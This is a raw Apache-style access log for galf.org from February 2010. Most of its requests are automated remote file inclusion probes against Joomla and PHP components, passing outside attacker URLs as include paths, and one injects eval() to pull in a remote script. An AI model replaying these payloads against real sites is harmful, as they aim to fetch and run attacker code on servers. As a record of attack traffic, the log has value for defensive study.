174.36.1.51 - - [14/Feb/2010:23:18:41 -0800] "GET /logs/access_091130.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:18:45 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:23:19:25 -0800] "GET /logs/access_090824.log%20%20//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:19:32 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:19:32 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:19:32 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:23:19:34 -0800] "GET /logs/access_090713.log/?mosConfig_absolute_path=' HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:20:26 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:20:57 -0800] "GET /logs/access_090810.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:21:04 -0800] "GET /logs/access_090810.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:21:06 -0800] "GET /logs/access_091130.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:21:13 -0800] "GET /logs/access_091130.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.136.138 - - [14/Feb/2010:23:21:34 -0800] "GET /?boarddir=' HTTP/1.1" 200 1048 "-" "libwww-perl/5.834" "galf.org"
67.227.136.138 - - [14/Feb/2010:23:21:35 -0800] "GET /logs/access.log/?boarddir=' HTTP/1.1" 404 - "-" "libwww-perl/5.834" "galf.org"
67.227.136.138 - - [14/Feb/2010:23:21:36 -0800] "GET /?boarddir=' HTTP/1.1" 200 1048 "-" "libwww-perl/5.834" "galf.org"
67.227.136.138 - - [14/Feb/2010:23:21:36 -0800] "GET /logs/?boarddir=' HTTP/1.1" 200 4942 "-" "libwww-perl/5.834" "galf.org"
174.36.1.51 - - [14/Feb/2010:23:22:31 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:22:51 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:25:49 -0800] "GET /v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:25:49 -0800] "GET /logs//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:25:49 -0800] "GET /logs/access_090720.log//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.11.20.12 - - [14/Feb/2010:23:26:44 -0800] "GET /write_comment_update.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.11.20.12 - - [14/Feb/2010:23:26:44 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.11.20.12 - - [14/Feb/2010:23:26:45 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:27:16 -0800] "GET /v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:27:16 -0800] "GET /logs//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:27:16 -0800] "GET /logs/access_090713.log//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:27:30 -0800] "GET /logs/access_090824.log//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:28:24 -0800] "GET /logs/access_090713.log//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:28:24 -0800] "GET /logs/access_090824.log//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.11.20.12 - - [14/Feb/2010:23:28:24 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.11.20.12 - - [14/Feb/2010:23:28:24 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.11.20.12 - - [14/Feb/2010:23:28:25 -0800] "GET /write_comment_update.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:29:31 -0800] "GET /logs/access_090928.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:29:31 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:29:31 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:29:39 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:29:54 -0800] "GET /logs/access_090928.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:29:54 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:23:30:32 -0800] "GET /skin/zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:23:30:32 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:23:30:32 -0800] "GET /logs/access_100118.log%20%20/skin/zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:23:31:27 -0800] "GET /skin/zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:23:31:27 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:23:31:27 -0800] "GET /logs/access_100118.log%20%20/skin/zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:32:31 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.36.1.51 - - [14/Feb/2010:23:32:31 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.36.1.51 - - [14/Feb/2010:23:32:31 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.36.1.51 - - [14/Feb/2010:23:32:33 -0800] "GET /logs/access_100111.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:23:32:33 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:33:00 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:33:00 -0800] "GET /logs/access_090928.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:33:00 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:33:31 -0800] "GET /logs/access_091221.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.30 - - [14/Feb/2010:23:33:34 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:23:33:50 -0800] "GET /logs/access_090831.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:23:33:50 -0800] "GET /main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:23:33:50 -0800] "GET /logs//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:23:34:14 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [14/Feb/2010:23:34:27 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.110.50.120 - - [14/Feb/2010:23:34:27 -0800] "GET /logs/access_090907.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.110.50.120 - - [14/Feb/2010:23:34:27 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.110.50.120 - - [14/Feb/2010:23:34:43 -0800] "GET /logs/access_090928.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
208.87.240.120 - - [14/Feb/2010:23:35:16 -0800] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [14/Feb/2010:23:35:16 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [14/Feb/2010:23:35:16 -0800] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [14/Feb/2010:23:35:28 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:23:40:06 -0800] "GET /logs/access_090720.log//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:41:02 -0800] "GET /logs/access_090720.log/phphtml.php?htmlclass_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:41:02 -0800] "GET /logs/phphtml.php?htmlclass_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:41:02 -0800] "GET /phphtml.php?htmlclass_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:41:21 -0800] "GET /logs/access_090720.log/phphtml.php?htmlclass_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:41:21 -0800] "GET /logs/phphtml.php?htmlclass_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:41:21 -0800] "GET /phphtml.php?htmlclass_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:23:41:29 -0800] "GET /logs/access_090831.log//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:23:41:33 -0800] "GET /logs/access_090803.log//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:41:33 -0800] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:41:33 -0800] "GET /logs/access_090720.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:41:33 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.112.161 - - [14/Feb/2010:23:42:00 -0800] "GET /logs/access_091005.log HTTP/1.0" 200 7786947 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:42:49 -0800] "GET /include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:42:49 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.158.246 - - [14/Feb/2010:23:42:49 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.54.22.2 - - [14/Feb/2010:23:44:45 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
74.54.22.2 - - [14/Feb/2010:23:44:45 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:45:38 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:45:38 -0800] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:45:38 -0800] "GET /logs/access_090713.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [14/Feb/2010:23:45:39 -0800] "GET /logs/access_090921.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [14/Feb/2010:23:45:48 -0800] "GET /logs/access_090907.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:45:56 -0800] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:45:56 -0800] "GET /logs/access_090713.log%20%20//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:45:56 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:46:21 -0800] "GET /logs/access_100111.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [14/Feb/2010:23:47:10 -0800] "GET /logs/access_090928.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.110.50.120 - - [14/Feb/2010:23:47:10 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.110.50.120 - - [14/Feb/2010:23:47:10 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:23:47:43 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:23:47:43 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:23:47:43 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:23:49:56 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:23:49:56 -0800] "GET /logs/access_090720.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:23:49:56 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [14/Feb/2010:23:50:29 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [14/Feb/2010:23:50:29 -0800] "GET /logs/access_100201.log%20%20//bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [14/Feb/2010:23:50:29 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [14/Feb/2010:23:50:51 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [14/Feb/2010:23:50:51 -0800] "GET /logs/access_100201.log%20%20//bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [14/Feb/2010:23:50:51 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:52:05 -0800] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:52:05 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [14/Feb/2010:23:52:05 -0800] "GET /logs/access_090713.log%20%20//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.249.18.67 - - [14/Feb/2010:23:52:47 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
194.249.18.67 - - [14/Feb/2010:23:52:47 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
66.249.65.86 - - [14/Feb/2010:23:52:49 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
74.54.22.2 - - [14/Feb/2010:23:54:14 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
74.54.22.2 - - [14/Feb/2010:23:54:14 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
